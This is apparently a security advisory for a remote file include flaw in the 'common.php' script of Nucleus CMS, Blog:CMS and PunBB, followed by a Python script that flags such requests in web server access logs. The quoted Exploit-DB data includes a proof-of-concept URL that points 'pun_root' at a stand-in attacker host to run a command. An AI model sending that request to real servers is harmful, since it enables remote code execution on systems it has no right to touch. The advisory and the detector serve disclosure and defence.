Vendor: Nucleus CMS, Blog:CMS, and PunBB
CVSS: 7.5 (HIGH)
CWE: Remote File Include
Product Name: Nucleus CMS, Blog:CMS, and PunBB
Patch Exists: NO

Remote File Include Vulnerability in Nucleus CMS, Blog:CMS, and PunBB

Nucleus CMS, Blog:CMS, and PunBB contain a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code, which is then executed on the vulnerable computer. Input passed to the 'common.php' script is not sufficiently sanitized.

Mitigation:

Apply a patch or update to the latest version of the affected applications. Additionally, restrict access to the 'common.php' script to trusted sources only.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10760/info

Nucleus CMS, Blog:CMS, and PunBB are vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable computer.

Input passed to the 'common.php' script is not sufficiently sanitized.

All three applications are vulnerable because they have a similar or identical code base.

http://www.example.com/forum/include/common.php?pun_root=http://www.host_evil.com/cmd?&=id
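
Detection logic for the request pattern shown above, added here as an example (not code from the advisory or from the affected projects): it scans web server access logs for requests to 'common.php' in which any query parameter carries a URL-like value, and it generalizes beyond http:// to other PHP stream wrappers. The combined log format, the function names and the sample log lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Schemes/wrappers through which PHP include/require can pull in non-local content.
REMOTE_SCHEME = re.compile(r"^\s*(?:https?|ftps?|php|expect)://|^\s*data:", re.I)
# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def rfi_params(target, script="common.php"):
    """Return [(param, value)] where a request to `script` passes a URL-like value."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/" + script):
        return []
    # parse_qsl percent-decodes, so encoded forms (http%3A%2F%2F...) are caught too.
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    return [(k, v) for k, v in pairs if REMOTE_SCHEME.match(v)]

def scan(lines):
    """Yield (line_no, client_ip, hits) for each suspicious log line."""
    for no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        hits = rfi_params(m.group(1))
        if hits:
            yield no, line.split(" ", 1)[0], hits

# Constructed sample log lines (documentation IP ranges and reserved hostnames).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /forum/index.php HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /forum/include/common.php?pun_root=http://remote.example/x? HTTP/1.1" 200 312',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /forum/include/common.php?pun_root=hTTp%3A%2F%2Fremote.example%2Fx HTTP/1.1" 200 298',
    '198.51.100.7 - - [01/Jan/2024:10:00:12 +0000] "GET /forum/include/common.php?pun_root=./ HTTP/1.1" 200 0',
    '198.51.100.7 - - [01/Jan/2024:10:00:15 +0000] "GET /forum/viewtopic.php?ref=http://www.example.com/ HTTP/1.1" 200 901',
]

if __name__ == "__main__":
    for no, ip, hits in scan(SAMPLE_LOG):
        print(f"line {no}: {ip} -> {hits}")
```

Access logs record only the query string, so values submitted in a POST body are not visible to this check and need to be inspected at the application or WAF layer.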